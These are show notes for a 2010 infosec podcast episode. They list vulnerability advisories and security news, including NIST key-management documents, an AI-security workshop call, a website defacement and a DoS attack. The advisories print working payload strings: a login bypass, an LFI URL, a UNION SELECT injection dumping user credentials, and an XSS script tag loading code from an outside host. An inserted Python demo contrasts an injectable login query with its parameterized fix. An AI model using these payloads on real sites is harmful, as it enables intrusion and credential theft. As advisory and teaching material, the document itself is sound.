Your daily source of Pwnage, Policy and Politics.

Episode 73 – N1H1

ISD Podcast Episode 73 for February 23, 2010. This podcast is our contribution back to the community, where we discuss the vulnerabilities of interest and information-security-related news, hopefully providing you a few laughs and a little knowledge.

Announcements:

Vulnerabilities of Interest:

  1. The Linux kernel is subject to an RTO (Retransmission Timeout) remote denial-of-service vulnerability. Attackers can exploit this issue to cause an excessive load on CPU and network resources, denying service to legitimate users. Attackers can use readily available network utilities to exploit this issue.
  2. WSC CMS is subject to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. Attackers can use a browser to exploit this issue. The following example is available:
     1. http://www.sample.com/public/backoffice
     2. log in with "admin" as the user name and 'or' as the password
  3. Gretech GOM Player is subject to a remote buffer-overflow vulnerability because the application fails to perform adequate boundary checks on user-supplied input. Attackers may leverage this issue to execute arbitrary code in the context of the application. Failed attacks will cause denial-of-service conditions. GOM Player 2.1.21.4846 is vulnerable; other versions may also be affected.
  4. Konversation IRC is subject to a remote denial-of-service vulnerability. An attacker may exploit this issue to crash the application, resulting in a denial-of-service condition.  Versions prior to Konversation 1.2.3 are vulnerable. An attacker can use readily available network utilities to exploit this issue.
  5. vBseo is subject to a Local File Include vulnerability. Version 3.1.0 is vulnerable, though other versions may be impacted. Exploit code is available: http://www.sample.com/[path]/vbseo.php?vbseoembedd=1&vbseourl=[LFI]
  6. Official Portal 2007 is subject to multiple vulnerabilities, including SQL injection and Cross Site Scripting. Google dork: "Official Portal 2007". Exploit code is available. SQL injection: http://www.sample.com/?fa=content.detail&id=-72+union+select+1,concat_ws%280x3a,userid,username,pwd%29,3,4,5,6,7,8,9,10,11+from+tuser–
     Cross Site Scripting: http://www.sample.com/?fa=<SCRIPT/SRC="http://site.com/xss.js"></SCRIPT>
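Items 2 and 6 above are the classic login-bypass form of SQL injection: user input spliced into the SQL text so that quotes in the input rewrite the query. The following is an added illustration, not code from WSC CMS or Official Portal; it assumes a plain username/password lookup, builds an in-memory SQLite table with one constructed user, and uses a generic tautology payload rather than the advisory's exact string.

```python
"""Login-bypass SQL injection: string-built query beside its parameterized form.

Added illustration (not WSC CMS code). Uses an in-memory SQLite table
constructed here with a single user so it runs offline.
"""
import sqlite3


def build_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    # Constructed sample row; a real application would store a salted hash.
    db.execute("INSERT INTO users (username, password) VALUES ('admin', 's3cret')")
    db.commit()
    return db


def vulnerable_login(db, username, password):
    """The flawed pattern: input is spliced into the SQL text, so a quote in
    the input ends the literal and the rest becomes SQL operators."""
    sql = ("SELECT id FROM users WHERE username = '%s' AND password = '%s'"
           % (username, password))
    return db.execute(sql).fetchone() is not None


def safe_login(db, username, password):
    """Parameterized query: the driver passes values separately from the SQL
    text, so input is only ever compared as data, never parsed as SQL."""
    sql = "SELECT id FROM users WHERE username = ? AND password = ?"
    return db.execute(sql, (username, password)).fetchone() is not None


# Generic tautology payload, constructed for this demo (not the advisory's
# exact string). Spliced in, the WHERE clause becomes
#   username = 'admin' AND password = '' OR '1'='1'
# which matches every row because AND binds tighter than OR.
TAUTOLOGY = "' OR '1'='1"


def demo():
    db = build_db()
    return {
        "vulnerable_bypassed": vulnerable_login(db, "admin", TAUTOLOGY),  # True
        "safe_bypassed": safe_login(db, "admin", TAUTOLOGY),              # False
        "safe_correct": safe_login(db, "admin", "s3cret"),                # True
    }


if __name__ == "__main__":
    print(demo())
```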

News Items of Interest:

News item 1:  http://gcn.com/articles/2010/02/19/nist-crypto-docs-021910.aspx

The National Institute of Standards and Technology has released two documents as part of its Cryptographic Key Management Project — a summary of a key management workshop held in June that explored the risks and challenges of handling cryptographic keys in new technological environments, and a draft of recommendations for agencies on transitioning to new algorithms and keys.

Key management is one of the most difficult tasks in cryptography, because a cryptographic algorithm or scheme is only as secure as the keys used to encrypt and decrypt data. The scalability and usability of the methods used to distribute keys are of particular concern. NIST’s key management project is an effort to improve the overall key management strategies to enhance the usability of cryptographic technology, provide scalability and support a global cryptographic key management infrastructure.

The first step in achieving those goals was a workshop NIST hosted in June that examined the obstacles in using the key management methodologies currently in use. It also covered alternative technologies that key management needs to accommodate and approaches for moving from current methodologies to more desirable methods.

The results of the workshop are summarized in NIST Interagency Report 7609. An approach to transitioning to new generations of keys and algorithms is provided in a draft of Special Publication 800-131, “Recommendation for the Transitioning of Cryptographic Algorithms and Key Sizes.”

News item 2: http://www.tzi.de/~edelkamp/secart

SECART – Second International Workshop on Security and Artificial Intelligence, Atlanta, Georgia, July 11, 2010. Workshop themes include both applied and theoretical results regarding the application of AI techniques to security problems (or, alternatively, novel security issues caused by the use of AI techniques). Possible topics include but are not limited to the following:

*  Knowledge Representation and Engineering for Cyber Security
*  Secure Web Services
*  Development of Trusted Software
*  Data Mining and Forensics
*  Automated Vulnerability Analysis
*  Automated Exploit and Attack Generation
*  Automated Alerting and Response
*  Diagnosis and Plan Recognition
*  Automating Security Analyses and Audits
*  Artificial Immune Systems
*  Privacy and Confidentiality
*  Intelligent User Interfaces for Security Applications
*  Security and Organizational Structure

WORKSHOP ORGANISERS

Chairs:

*  Mark Boddy, Adventium Labs, Minneapolis, USA (mark.boddy@adventiumlabs.org)
*  Stefan Edelkamp, TZI, University Bremen, Germany (edelkamp@tzi.de)
*  Robert P. Goldman, SIFT, LLC, Minneapolis, USA (rpgoldman@sift.info)

Program Committee:

*  Lee Badger (NIST, US)
*  Bob Balzer (Teknowledge, US)
*  Mark Boddy (Adventium Labs, US)
*  Cas Cremers (ETH, Switzerland)
*  Stefan Edelkamp (U Bremen, G)
*  Chris Geib (U Edinburgh, GB)
*  Robert P. Goldman (SIFT, US)
*  Rachel Greenstadt (Drexel U, US)
*  Henry Kautz (U of Rochester, US)
*  Alessio Lomuscio (IC London, GB)
*  Norbert Pohlmann (IF(IS), G)
*  Anil Somayaji (Carleton U, CA)
*  Shannon Spires (Sandia Labs, US)
*  Tim Strayer (BBN Technologies, US)
*  Karsten Sohr (TZI Bremen, G)
*  Dan Thomsen (SIFT and CDA, US)
*  Luca Vigano (U Verona, I)
*  Yacine Zemali (LIFO, FR)

Deadline for submissions:   March 29, 2010

Notification of acceptance: April 15, 2010

Final versions due:         May 4, 2010

Articles of up to 8 pages in AAAI plain article style should be submitted in PDF format to the EasyChair system (https://www.easychair.org/login.cgi?conf=secart10) by the March 29, 2010 deadline.

Attendance fees will be posted as they become available from AAAI. In the past, AAAI has permitted workshop-only registrations. SECART is affiliated with AAAI-10.

News item 3: http://www.dailymail.co.uk/news/worldnews/article-1252738/Argentinian-hackers-plaster-countrys-flag-Falklands-newspaper-website-new-conflict-begins.html

Argentinian hackers drew first blood in the latest Falklands stand-off by plastering the country’s flag across the islands’ newspaper website.

The computer attack came as a British oil rig was set to begin searching for oil after arriving in the South Atlantic waters from Scotland.

The Argentine activists hacked into the English-language Penguin News to post a flag on the home page and an audio recording of the song “March of the Malvinas,” Argentina’s name for the Falklands.

They also wrote ‘the islands are Argentine’ and claimed the move was a ‘tribute’ to the country’s soldiers who died during the Falklands War.

The material has now been removed.

News item 4: http://twitter.com/th3j35t3r

Infamous patriot hacker The Jester (th3j35t3r) has released a video demonstration of the XerXeS DoS attack as it is unleashed on the Taliban website www.alemarah.com.

The video release follows an earlier announcement that The Jester has been working to improve and automate aspects of the attack method, which, unlike a DDoS attack, requires only one low-spec machine to implement.

The Jester is always quick to point out his claim that his attacks produce absolutely no permanent damage to the target site or any intermediary nodes.

All works represented here are compiled from various sources (email, IRC, forums, and original author/websites). If the original work is copyrighted it is presented under the fair use of a copyrighted work, Copyright Act of 1976, 17 U.S.C. § 107, for purposes of criticism, comment, news reporting, teaching, and research. No use is directly intended as an infringement of copyright. Attribution is always given to the original source, if known. To have any copyrighted material removed, please contact isdpodcast[at]isdpodcast[dot]com.

Trackbacks/Pingbacks

  1. InfoSec Daily Show Shout-Outs! « Jester's Court – Stay Frosty My Friends - [...] broadcast on 23rd February 2010) Link to original show – also link to Exclusive XerXes Videos HERE and [...]